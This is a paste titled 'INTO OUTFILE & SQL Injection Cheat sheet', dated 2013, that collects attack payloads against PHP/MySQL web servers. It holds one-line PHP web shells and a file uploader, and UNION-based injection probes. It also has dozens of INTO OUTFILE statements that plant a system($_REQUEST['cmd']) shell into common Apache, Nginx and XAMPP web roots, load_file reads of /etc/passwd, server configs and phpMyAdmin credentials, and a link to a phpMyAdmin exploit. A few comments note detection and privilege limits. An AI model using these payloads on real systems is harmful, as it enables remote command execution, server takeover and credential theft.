Xylitol

INTO OUTFILE & SQL Injection Cheat sheet

Dec 8th, 2013
  1. // SiMPLE UPLOADER:
  2. <?php echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='filele' size='44'><input type='submit'></form>";@copy($_FILES['filele']['tmp_name'],$_FILES['filele']['name']);?>
  3.  
  4. <?php fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i])); ?>
  5. cmd.php?o=shellname.php&i=shit.txt
  6.  
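  7. // CMD: (one-line web shell; to detect it, scan the web root for PHP files that pass $_GET/$_REQUEST straight into system(); listing system in php.ini disable_functions stops it from executing)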
  8. <? system($_GET['c']); ?>
  9.  
  10. // WEBSERVER iNFO:
  11. <? phpinfo(); ?>
  12.  
  13. // SQL QUERY:
  14. <? ... $result = mysql_query($_GET['query']); … ?>
  15.  
  16. ---
  17.  
  18. GATHERiNG iNFORMATiONS:
  19. MySQL 4: 0′ UNION SELECT load_file(’a’),null/*
  20. MySQL 5: 0′ UNION SELECT @@datadir,null/*
  21. DB NAME: 0′ UNION SELECT database(),null/*
  22. ERROR..: 0′ AND 1=’0
  23. SELECT @@hostname;
  24. SELECT @@datadir;
  25. SELECT @@version;
  26.  
  27. ---
  28.  
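  29. WAMP / XAMPP: // every INTO OUTFILE line in this paste is refused when the DB account lacks the FILE privilege, when secure_file_priv is NULL or names a different directory, when the target file already exists, or when the mysqld OS account cannot write to the directory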
  30. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/htdocs/cmd.php"
  31. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/phpmyadmin/cmd.php"
  32. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "C:\wamp\htdocs\cmd.php"
  33. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/opt/lampp/htdocs/xampp/cmd.php"
  34. DEDiCATED/TYPiCAL:
  35. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"
  36. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php"
  37. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/web1/html/cmd.php"
  38. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/sitename/htdocs/cmd.php"
  39. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/localhost/htdocs/cmd.php"
  40. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/vhosts/sitename/httpdocs/cmd.php"
  41.  
  42. NGiNX:
  43. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/etc/nginx/sites-available/default/cmd.php"
  44. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/local/nginx/html/cmd.php"
  45. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/share/nginx/html/cmd.php"
  46. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/local/nginx/cmd.php"
  47. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/usr/nginx/htmlcmd.php"
  48. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/nginx-default/cmd.php"
  49. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/sitename/cmd.php"
  50. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php"
  51. SELECT "<? system($_REQUEST['cmd']); ?>" INTO OUTFILE "/home/wwwroot/default/cmd.php"
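  52. --- // LOAD_FILE() returns NULL unless the DB account has the FILE privilege, the mysqld OS account can read the file, and secure_file_priv allows the path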
  53. SELECT load_file('/usr/local/nginx/conf/nginx.conf')
  54. SELECT load_file('/etc/init.d/nginx')
  55. SELECT load_file('/etc/passwd')
  56. SELECT load_file('/etc/networks')
  57. SELECT load_file('/etc/hosts')
  58. SELECT HEX(LOAD_FILE('/var/log/wtmp'))
  59.  
  60. APACHE:
  61. SELECT load_file('/etc/init.d/apache')
  62. SELECT load_file('/etc/init.d/apache2')
  63. SELECT load_file('/etc/httpd/httpd.conf')
  64. SELECT load_file('/etc/apache/apache.conf')
  65. SELECT load_file('/etc/apache/httpd.conf')
  66. SELECT load_file('/etc/apache2/apache2.conf')
  67. SELECT load_file('/etc/apache2/httpd.conf')
  68. SELECT load_file('/usr/local/apache2/conf/httpd.conf')
  69. SELECT load_file('/usr/local/apache/conf/httpd.conf')
  70. SELECT load_file('/opt/apache/conf/httpd.conf')
  71. SELECT load_file('/home/apache/httpd.conf')
  72. SELECT load_file('/home/apache/conf/httpd.conf')
  73. SELECT load_file('/etc/apache2/sites-available/default')
  74. SELECT load_file('/etc/apache2/vhosts.d/default_vhost.include')
  75.  
  76. PMA:
  77. SELECT load_file( '/phpmyadmin/config.inc.php' )
  78.  
  79. ---
  80.  
  81. SPLOiTZ:
  82. http://www.rapid7.com/db/modules/exploit/multi/http/phpmyadmin_preg_replace